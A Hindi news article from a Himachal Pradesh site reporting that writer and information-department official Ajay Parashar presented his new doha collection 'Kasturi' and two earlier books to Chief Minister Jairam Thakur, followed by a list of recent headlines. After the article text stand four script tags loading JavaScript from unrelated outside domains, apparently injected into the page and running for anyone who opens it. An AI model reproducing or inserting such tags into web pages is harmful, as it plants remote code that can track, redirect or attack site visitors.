Categories: हिमाचल

वरिष्ठ साहित्यकार अजय पाराशर ने मुख्यमंत्री को भेंट की पुस्तक

<p>वरिष्ठ साहित्यकार एवं प्रदेष के सूचना एवं जन सम्पर्क विभाग के क्षेत्रीय कार्यालय, धर्मशाला में बतौर उप निदेशक तैनात अजय पाराशर ने आज मुख्यमंत्री जयराम ठाकुर को नूरपुर में अपनी सद्य् प्रकाशित काव्य पुस्तक &ldquo;कस्तूरी&ldquo; भेंट की। उन्होंने मुख्यमंत्री को इसके अलावा अपनी दो अन्य पुस्तकें, जिनमें एड्स पीड़ितों की व्यथा को दर्शाता कहानी संग्रह &ldquo;मैं जीना सिखाता हूं&ldquo; और काव्य संग्रह &ldquo;मौन की अभिव्यक्ति&ldquo; शामिल हैं, भी भेंट की।<br />
मुख्यमंत्री जयराम ठाकुर ने अजय पाराशर को उनकी नवीनतम पुस्तक के लिए बधाई देते हुए कहा कि उनके इस प्रयास से प्रदेश के साहित्य को और समृद्ध बनाने में सहायता मिलेगी। साहित्य समाज का दर्पण है और साहित्यकारों के प्रयास लोगों को समाज की तमाम गतिविधियों और दशाओं से अवगत कराते हैं। साहित्य हमें विभिन्न देशों और काल से रू-ब-रू करवाता है।</p>

<p>ग़ौरतलब है कि हिमाचल में साल 1947 के बाद ऊना क्षेत्र के जगत प्रकाश शास्त्री की सतसई के उपरान्त 73 सालों बाद प्रकाशित होने वाली यह पहली दोहावली है। इस दोहावली को सात खंडों-आराधना, नैना, श्रृंगार, दर्शन, नीति, प्रकृति और लोकोक्तियों पर आधारित दोहों के माध्यम से विभाजित 20 उपखंडों-राम, शाम, शिव, पिताजी, प्रेम, रासलीला, श्रृंगार, दर्शन, चौरासी, चरखा, गुरू, मन, बिरह, नीति, आडम्बर, देह, दरिया, प्रकृति, मौसम तथा कागा में जीवन के तमाम पहलुओं को छूने का प्रयास किया गया है। लौकिक एवं लोकोत्तर के विस्तार में आत्म तथा अनात्म, व्यक्तित्व की खोज, अस्मिता की तलाश, आत्म-समर्पण, बौद्धिकता, संवेदन और सम्प्रेषण, संयम-संतुलन आदि में भटकते हुए, इस संग्रह में इसमें कुल 709 दोहे शामिल हैं। इस अवसर पर अजय पाराषर ने बताया कि वह आजकल ड्रग्स प्रभावित व्यक्तियों और पौंग बॉंध विस्थापितों की व्यथाओं पर आधारित कहानियों पर काम कर रहें हैं। यह दोनों पुस्तकें के इस साल के अंत तक प्रकाशित होने की सम्भावना है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581675118905″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

मुश्किल में हिमाचल की जनता: बिजली-पानी के बाद अब केंद्र ने की सस्ते राशन में कटौती

  Shimla: एक तरफ जहां हिमाचल में कांग्रेस सरकार बिजली की दरें बढ़ाकर और ग्रामीण…

1 hour ago

आज का राशिफल: 24 सितंबर 2024, जानें आपके लिए कैसा रहेगा मंगलवार

  मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज आपका दिन अच्छा…

2 hours ago

धर्मशाला में 29 से वन विभाग की राज्य स्तरीय स्पोर्ट्स और ड्यूटी मीट

  सांस्कृतिक कार्यक्रमों का भी होगा आयोजन Dharamshala: जिला मुख्यालय धर्मशाला में 25वीं स्टेट लेवल…

2 hours ago

ग्रीन एनर्जी प्रोजेक्ट में बड़ा घोटाला, विक्रम सिंह ठाकुर का बड़ा दावा

स्कैम की जांच करवाए, नहीं तो भाजपा करेगी बड़े आंदोलन का आगाज धर्मशाला। पूर्व उद्योग…

2 hours ago

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

17 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

17 hours ago